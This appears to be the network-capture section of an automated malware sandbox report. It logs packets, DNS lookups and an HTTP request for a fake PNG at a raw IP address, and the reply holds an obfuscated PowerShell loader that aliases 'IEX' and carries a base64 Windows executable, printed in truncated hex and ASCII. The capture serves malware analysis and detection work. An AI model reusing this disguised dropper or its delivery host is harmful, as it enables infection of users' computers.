      Jan 15, 2025 05:44:53.372313976 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372365952 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372427940 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372432947 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.372461081 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372497082 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372524977 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.372534990 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372570038 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372607946 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372617006 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.372668028 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.372930050 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.372986078 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373022079 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373045921 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.373056889 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373092890 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373127937 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373153925 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.373168945 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.373178959 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374180079 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374233961 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374249935 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374274969 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374311924 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374347925 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374366045 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374383926 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374399900 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374427080 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374516010 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374891043 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374927044 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374963045 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.374980927 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.374998093 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375035048 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375070095 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375082016 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.375108004 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375117064 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.375677109 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375735998 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375770092 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375797033 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.375806093 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.375838995 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.375843048 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.379348993 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.492372036 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492415905 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492502928 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492506981 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.492541075 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492575884 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492605925 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.492613077 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492646933 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492655993 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.492685080 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.492738962 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.492990017 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493030071 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493063927 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493097067 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.493102074 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493275881 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.493608952 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493659973 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493696928 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493704081 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.493732929 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493768930 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493783951 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.493804932 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493843079 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.493879080 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.494226933 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494296074 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.494321108 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494355917 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494396925 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494410992 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.494434118 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494469881 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494499922 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.494504929 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.494570017 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.495284081 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.495343924 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.495379925 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.495414019 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.495448112 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.495450020 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.495485067 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.515969038 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:53.521322966 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.733654022 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.733705997 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:44:53.733781099 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:44:55.118432999 CET6201753192.168.2.41.1.1.1
      Jan 15, 2025 05:44:55.123765945 CET53620171.1.1.1192.168.2.4
      Jan 15, 2025 05:44:55.123874903 CET6201753192.168.2.41.1.1.1
      Jan 15, 2025 05:44:55.123914957 CET6201753192.168.2.41.1.1.1
      Jan 15, 2025 05:44:55.129028082 CET53620171.1.1.1192.168.2.4
      Jan 15, 2025 05:44:55.577868938 CET53620171.1.1.1192.168.2.4
      Jan 15, 2025 05:44:55.579113007 CET6201753192.168.2.41.1.1.1
      Jan 15, 2025 05:44:55.584692955 CET53620171.1.1.1192.168.2.4
      Jan 15, 2025 05:44:55.584774971 CET6201753192.168.2.41.1.1.1
      Jan 15, 2025 05:45:01.525156975 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:01.525214911 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:01.525386095 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:02.939882040 CET49738443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:02.939903021 CET44349738216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:37.438369989 CET4974280192.168.2.4176.113.115.170
      Jan 15, 2025 05:45:37.443764925 CET8049742176.113.115.170192.168.2.4
      Jan 15, 2025 05:45:38.735363007 CET4974180192.168.2.4176.113.115.170
      Jan 15, 2025 05:45:38.740557909 CET8049741176.113.115.170192.168.2.4
      Jan 15, 2025 05:45:51.002412081 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:51.002496958 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.002901077 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:51.003029108 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:51.003063917 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.637437105 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.637865067 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:51.637929916 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.638403893 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.638887882 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:51.639019966 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:45:51.689042091 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:45:52.940417051 CET4974280192.168.2.4176.113.115.170
      Jan 15, 2025 05:45:52.945588112 CET8049742176.113.115.170192.168.2.4
      Jan 15, 2025 05:45:52.945801020 CET4974280192.168.2.4176.113.115.170
      Jan 15, 2025 05:45:54.688199997 CET4972380192.168.2.4199.232.214.172
      Jan 15, 2025 05:45:54.688268900 CET4972480192.168.2.4199.232.214.172
      Jan 15, 2025 05:45:54.693885088 CET8049723199.232.214.172192.168.2.4
      Jan 15, 2025 05:45:54.693917990 CET8049724199.232.214.172192.168.2.4
      Jan 15, 2025 05:45:54.693950891 CET4972380192.168.2.4199.232.214.172
      Jan 15, 2025 05:45:54.693985939 CET4972480192.168.2.4199.232.214.172
      Jan 15, 2025 05:46:01.577892065 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:46:01.578017950 CET44362078216.58.206.68192.168.2.4
      Jan 15, 2025 05:46:01.578196049 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:46:02.942121029 CET62078443192.168.2.4216.58.206.68
      Jan 15, 2025 05:46:02.942184925 CET44362078216.58.206.68192.168.2.4
      TimestampSource PortDest PortSource IPDest IP
      Jan 15, 2025 05:44:46.689193010 CET53627861.1.1.1192.168.2.4
      Jan 15, 2025 05:44:46.786442995 CET53539401.1.1.1192.168.2.4
      Jan 15, 2025 05:44:48.041821957 CET53555221.1.1.1192.168.2.4
      Jan 15, 2025 05:44:50.939783096 CET5299853192.168.2.41.1.1.1
      Jan 15, 2025 05:44:50.939883947 CET5804753192.168.2.41.1.1.1
      Jan 15, 2025 05:44:50.946963072 CET53529981.1.1.1192.168.2.4
      Jan 15, 2025 05:44:50.946993113 CET53580471.1.1.1192.168.2.4
      Jan 15, 2025 05:44:55.117964983 CET53527041.1.1.1192.168.2.4
      Jan 15, 2025 05:45:06.288731098 CET138138192.168.2.4192.168.2.255
      Jan 15, 2025 05:45:46.339690924 CET53595061.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jan 15, 2025 05:44:50.939783096 CET192.168.2.41.1.1.10x7786Standard query (0)www.google.comA (IP address)IN (0x0001)false
      Jan 15, 2025 05:44:50.939883947 CET192.168.2.41.1.1.10x9a3aStandard query (0)www.google.com65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 15, 2025 05:44:50.946963072 CET1.1.1.1192.168.2.40x7786No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
      Jan 15, 2025 05:44:50.946993113 CET1.1.1.1192.168.2.40x9a3aNo error (0)www.google.com65IN (0x0001)false
      • 176.113.115.170
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449741176.113.115.17080560C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      Jan 15, 2025 05:44:52.478908062 CET437OUTGET /1/1.png HTTP/1.1
      Host: 176.113.115.170
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Jan 15, 2025 05:44:53.130054951 CET1236INHTTP/1.1 200 OK
      Content-Type: image/png
      Last-Modified: Tue, 14 Jan 2025 20:42:31 GMT
      Accept-Ranges: bytes
      ETag: "f45d88d5c466db1:0"
      Server: Microsoft-IIS/10.0
      Date: Wed, 15 Jan 2025 04:44:53 GMT
      Content-Length: 122750
      Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4e 66 4b 55 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 62 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 43 67 41 51 [TRUNCATED]
      Data Ascii: $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAblsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABRbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABQWwEAAAAAAEgAAAACAAUA6KAAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBBAAAAAQAAESjuAAAGIFE2Eswgz+dzkGElChleRQMAAADg////AgAAABsAAAArGSi5AgAGKKECAAYGIP8SVLxaIMAE8CNhK8oqAAAAEzAKAF4BAAACAAARIPIYfXkoAQAAKwoobAIABihlAQAGCyC/GCHJIBST
      Jan 15, 2025 05:44:53.130126953 CET1236INData Raw: 7a 4b 74 68 4a 52 4d 47 48 6c 35 46 43 41 41 41 41 4d 76 2f 2f 2f 2f 71 41 41 41 41 6a 67 41 41 41 4b 34 41 41 41 42 59 41 41 41 41 63 67 41 41 41 41 55 41 41 41 41 48 41 51 41 41 4f 41 49 42 41 41 41 67 57 4c 71 49 30 43 67 43 41 41 41 72 43 42
      Data Ascii: zKthJRMGHl5FCAAAAMv////qAAAAjgAAAK4AAABYAAAAcgAAAAUAAAAHAQAAOAIBAAAgWLqI0CgCAAArCBQXKEACAAYTBREFFgYgz1XqJSgDAAArKNgAAAaiEQUoigEABigBAgAGLQggrdR2nSUrBiABdX7VJSYRBiCqeJKoWmE4eP///wkXKHgCAAYRBiDJUzwsWiC3m4gbYThe////FP4GAwAABnN2AAAKKLECAAYNIFjKoJk
      Jan 15, 2025 05:44:53.130170107 CET1236INData Raw: 41 41 41 52 4b 44 41 42 41 41 59 71 41 41 41 54 4d 41 51 41 42 67 41 41 41 41 45 41 41 42 45 6f 32 51 49 41 42 69 6f 41 41 42 4d 77 42 41 41 48 41 41 41 41 41 51 41 41 45 51 49 6f 71 77 45 41 42 69 6f 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41
      Data Ascii: AAARKDABAAYqAAATMAQABgAAAAEAABEo2QIABioAABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAii1AAAGKgATMAQABwAAAAEAABECKKsBAAYqABMwBAAHAAAAAQAAEQIoOgIABioAEzAIAEgBAAAEAAARAijIAQAGCnMvAAAGCyDRLwFtIBmWCQJhJRMJHwpeRQoAAACuAAAA7gAAANUAAACPAAAAMQAAAML///9
      Jan 15, 2025 05:44:53.130208015 CET1236INData Raw: 57 75 67 6c 4a 6a 67 76 2f 76 2f 2f 45 51 63 66 43 78 45 48 48 77 75 56 43 42 38 4c 6c 57 47 65 45 51 77 67 66 71 5a 66 4b 46 6f 67 55 64 44 69 49 57 45 34 44 66 37 2f 2f 78 45 48 47 78 45 48 47 35 55 49 47 35 56 68 6e 68 45 48 48 42 45 48 48 4a
      Data Ascii: WuglJjgv/v//EQcfCxEHHwuVCB8LlWGeEQwgfqZfKFogUdDiIWE4Df7//xEHGxEHG5UIG5VhnhEHHBEHHJUIHJVhnhEMIL7VIkRaIEZm3r9hOOL9//8RBx8MEQcfDJUIHwyVYZ4RDCBzkj6LWiAftyVFYTjA/f//EQwg7DRY9FogtwCabmE4rf3//xEIEQYlF1gTBhELHxBk0pwRCBEGJRdYEwYRCx8YZNKcEQwgsP7gd1ogjAG
      Jan 15, 2025 05:44:53.130244970 CET1236INData Raw: 4b 48 6f 42 41 41 59 6f 66 67 45 41 42 68 45 46 4b 45 67 43 41 41 59 54 42 6e 34 42 41 41 41 45 41 68 45 47 46 68 45 45 47 6c 6b 6f 6d 51 49 41 42 68 45 47 70 51 45 41 41 42 73 4c 45 51 63 67 4e 54 50 5a 4a 6c 6f 67 53 4b 33 72 4d 32 45 34 55 76
      Data Ascii: KHoBAAYofgEABhEFKEgCAAYTBn4BAAAEAhEGFhEEGlkomQIABhEGpQEAABsLEQcgNTPZJlogSK3rM2E4Uv///34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYAwoGwIABn4BAAAEAggoVAEABihwAgAGpQEAABsLEQcgyJOBvFogoQpMQ2E44/7//xeNAQAAGw1
      Jan 15, 2025 05:44:53.130280018 CET1236INData Raw: 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 45 77 52 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 35 69 59 48 34 42 41 41 41 45 41 69
      Data Ascii: AOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwR+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBREHILZ/ZIVaIChuuWthOOz9//8GbhhqMwggAeDBISUrBiCoY5B2JSY40v3//wkWowEAABsLEQcgucK6wFogWp2I9GE4t/3//ygbAgAGfgEAAAQCCChUAQAGKHA
      Jan 15, 2025 05:44:53.130317926 CET776INData Raw: 79 76 35 39 66 79 55 72 42 69 42 2f 55 41 63 61 4a 53 59 34 6c 50 33 2f 2f 77 63 71 41 41 41 54 4d 41 6b 41 34 51 49 41 41 41 59 41 41 42 45 43 49 46 75 65 4b 69 4a 61 49 4a 35 43 4f 4b 31 68 45 41 41 67 46 67 77 70 62 43 44 4b 79 50 31 34 59 53
      Data Ascii: yv59fyUrBiB/UAcaJSY4lP3//wcqAAATMAkA4QIAAAYAABECIFueKiJaIJ5COK1hEAAgFgwpbCDKyP14YSUTBx8QXkUQAAAAAgEAALQAAAAVAQAAsAEAAC8BAAAFAAAA+QEAAN8BAADqAAAAmgAAAHoCAABMAgAAhwEAAKr///9cAQAAxwAAADh1AgAAfgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOC
      Jan 15, 2025 05:44:53.130356073 CET1236INData Raw: 41 51 41 47 4b 48 41 43 41 41 61 6c 41 51 41 41 47 77 73 52 42 79 44 78 58 56 66 30 57 69 41 4a 38 72 4b 63 59 54 6a 51 2f 66 2f 2f 42 6d 34 5a 61 69 34 49 49 4c 4d 74 6f 51 49 6c 4b 77 59 67 79 4f 64 48 54 53 55 6d 4f 4c 62 39 2f 2f 39 2b 41 51
      Data Ascii: AQAGKHACAAalAQAAGwsRByDxXVf0WiAJ8rKcYTjQ/f//Bm4Zai4IILMtoQIlKwYgyOdHTSUmOLb9//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmAMEQcgkjCvHFog9Yv1RmE4Y/3//34BAAAEAgkW/hwBAAAbKJkCAAYJFqMBAAAbCxEHIJ4KAF5aIGEto4R
      Jan 15, 2025 05:44:53.130393028 CET1236INData Raw: 41 42 45 67 63 41 41 41 41 41 6f 67 47 2b 5a 69 6c 43 42 6e 6f 58 72 68 59 53 55 54 44 42 38 6a 58 6b 55 6a 41 41 41 41 49 41 49 41 41 45 4d 43 41 41 41 32 42 41 41 41 34 41 4d 41 41 4d 45 43 41 41 42 45 41 51 41 41 2f 77 4d 41 41 41 55 41 41 41
      Data Ascii: ABEgcAAAAAogG+ZilCBnoXrhYSUTDB8jXkUjAAAAIAIAAEMCAAA2BAAA4AMAAMECAABEAQAA/wMAAAUAAABAAwAA2wIAAF7///+PAQAAsQEAAMUAAACJAgAAdgEAAPMBAADGAwAAiQMAANoBAACuAgAAXwMAAAYCAAAqAwAAGwEAAKwDAACjAAAACAEAAPkCAABnAgAAWgEAAKECAACIAAAARQAAAMQBAAA4MQQAABEHHw0RBx8
      Jan 15, 2025 05:44:53.130429983 CET1236INData Raw: 61 76 7a 2f 2f 78 45 48 48 77 6f 52 42 78 38 4b 6c 51 67 66 43 70 56 68 6e 68 45 48 48 77 73 52 42 78 38 4c 6c 51 67 66 43 35 56 68 6e 68 45 4d 49 46 53 63 6d 4a 74 61 49 4b 59 64 44 63 46 68 4f 44 6e 38 2f 2f 38 57 45 77 6f 52 44 43 42 41 38 68
      Data Ascii: avz//xEHHwoRBx8KlQgfCpVhnhEHHwsRBx8LlQgfC5VhnhEMIFScmJtaIKYdDcFhODn8//8WEwoRDCBA8hzmWiCBep6/YTgj/P//EQcaEQcalQgalWGeEQwgsFpsu1og/l74pGE4BPz//xYTBh8QKAoCAAYTBwYaWuAovAEABhMIEQwgZhvCSlogtZFGE2E42vv//xEIEQYlF1gTBhELHxhk0pwRDCCBPOZQWiCN2l+9YTi3+//
      Jan 15, 2025 05:44:53.136672974 CET1236INData Raw: 57 76 37 2f 2f 77 4e 37 43 51 41 41 42 43 41 41 41 41 41 42 4e 41 67 67 77 5a 53 30 44 69 55 72 42 69 44 70 2f 6f 6b 46 4a 53 59 48 49 50 37 78 46 52 78 61 59 54 67 78 2f 76 2f 2f 46 79 6f 41 41 7a 41 4a 41 41 63 41 41 41 41 41 41 41 41 41 41 69
      Data Ascii: Wv7//wN7CQAABCAAAAABNAggwZS0DiUrBiDp/okFJSYHIP7xFRxaYTgx/v//FyoAAzAJAAcAAAAAAAAAAih4AAAKKgATMAcAGQAAAAEAABECA30HAAAEAhcDHx9fYo0CAAACfQYAAAQqAAAAEzAHAJIAAAAHAAARFworViAOtBylIGBLpd5hJQsbXkUFAAAA2P///y4AAAAbAAAAAgAAAGUAAAArYwJ7BgAABAbgjwIAAAIoIgA
      Jan 15, 2025 05:44:53.515969038 CET381OUTGET /favicon.ico HTTP/1.1
      Host: 176.113.115.170
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Referer: http://176.113.115.170/1/1.png
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Jan 15, 2025 05:44:53.733654022 CET1236INHTTP/1.1 404 Not Found
      Content-Type: text/html
      Server: Microsoft-IIS/10.0
      Date: Wed, 15 Jan 2025 04:44:53 GMT
      Content-Length: 1245
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
